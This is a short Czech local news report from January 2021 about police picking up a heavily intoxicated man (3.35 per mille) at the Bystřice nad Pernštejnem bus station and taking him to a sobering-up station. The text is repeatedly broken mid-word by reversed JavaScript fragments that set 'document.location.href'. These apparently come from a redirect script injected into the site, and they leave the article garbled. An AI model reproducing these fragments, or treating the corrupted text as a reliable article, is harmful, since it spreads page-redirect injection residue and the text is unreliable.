Rainbow page separator

Opilec na nádraží nadýchal 3,35 promile, skončil na záchytce

Pondělí, 18. ledna 2021

Bystřice nad Pernštejnem / Silně opilého muže, kterému venku v mrazu hrozila újma na zdraví či životě, „sbírali“ z ulice bystřičtí policisté.
„Policisté přijali ve čtvrtek 14. ledna kolem půl dvanácté dopoledne na linku tísňového volání oznámení o opilém muži, který se nacházel na au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tobusovém nádraží v Bystřici nad Pernštejnem. Nejbližší policejní hlídka, která byla na mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to vyslána, nalezla šestatřicetiletého opileho muže, který nebyl schopen samostatné chůze. Že je pod vlivem alkoholu potvrdila také dechová zkouška, jejíž naměřená hodnota činila 3,35 promile,“ informovala o události policejní mluvčí Stanislava Rázlová.
Vzhledem k [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomu, že podnapilý muž svým jednáním ohrožoval svůj život a zdraví, policisté ho obratem zajistili a následně eskor[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovali do jihlavské protialkoholní záchytné stanice k vystřízlivění.

ilustrační fo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to